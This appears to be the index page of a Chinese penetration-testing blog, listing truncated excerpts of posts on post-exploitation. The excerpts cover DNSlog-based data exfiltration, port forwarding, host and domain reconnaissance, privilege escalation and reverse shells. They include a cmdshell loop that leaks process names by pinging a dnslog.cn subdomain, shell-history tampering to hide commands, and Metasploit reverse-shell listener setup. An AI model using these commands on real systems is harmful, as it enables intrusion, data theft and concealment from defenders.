利用dnslog探测目标进程
2021年12月30日 No comment常用于mssql高权限注入目标主机不岀网利用cmdshell for循环实现for /F %i in ('wmic process get Name ^| findstr ".exe"') do ping -n 1 %i.xxxx.dnslog.cn >nul用powershell&nb
阅读全文 »
端口转发python脚本
2021年12月23日 No commentlts.py -listen 80 2222lts.py -slave 10.10.10.10:80 10.10.10.10:3389#!/usr/bin/env python
# coding=utf-8
'''
===============
阅读全文 »
Linux主机信息收集
2021年12月22日 No commentlast 多数运维会接入内网登录系统这时候便可获取部分内网ip进而对内网IP段进行画像
Ifconfig -a/arp -a/netstat -anopt/ss -nt
ifconfig -a 查看内网ip 网卡 网关
route -n 内网路由情况,也能为内网网络拓扑提供一定的信息
IPtabl
阅读全文 »
Windows域信息收集提权命令
2021年12月20日 No comment获取Windows 其他信息http://www.fuzzysecurity.com/scripts/files/wmic_info.rar 查看WinRAR压缩文件等缓存文件打开方式:WIN+R -> %UserProfile%\Recent
C:\Users\Administrator\Recent //默认位置
dir %APPDATA%\Microsoft\Windows\Recent
dir 
阅读全文 »
Linux提权后总结
2021年08月10日 No comment发行类型 版本在命令前加空格 命令不会被记录
[空格]set +o history 设置命令不被记录
set -o history 恢复记录命令
history -d [num] 删除指定命令行 num指左边序号标示
echo
阅读全文 »
Windows提权辅助工具Windows-Exploit-Suggester
2019年08月14日 No comment安装 python 3.3.3安装xlrd库 https://pypi.org/project/xlrd/https://www.python.org/ftp/python/3.3.3/python-3.3.3.amd64.msihttps://www.python.org/ftp/python/3.3.3/python-3.3.
阅读全文 »
powershell反弹shell 的几种方法
2019年07月20日 No comment 如果想接收多个sessions的话,用msf执行以下命令进行监听 反弹成功以后,用sessions id 来选择要操作的目标 NC反弹msfconsole
use exploit/multi/hanler
set payload windows/shell/reverse_tcp
set lhost 1
阅读全文 »